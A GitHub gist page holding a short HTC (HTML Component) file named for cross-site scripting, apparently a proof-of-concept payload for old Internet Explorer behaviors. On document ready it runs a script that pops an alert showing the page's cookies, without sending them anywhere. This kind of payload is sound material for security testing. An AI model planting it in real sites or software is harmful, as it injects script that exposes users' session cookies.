Skip to content

Instantly share code, notes, and snippets.

@dlh3
Last active October 12, 2018 22:25
Show Gist options
  • Save dlh3/c29127d790c38f2f246a7bb9da4ca8c9 to your computer and use it in GitHub Desktop.
Save dlh3/c29127d790c38f2f246a7bb9da4ca8c9 to your computer and use it in GitHub Desktop.
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("HTC script executed.\n" + document.cookie);
}
</SCRIPT>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment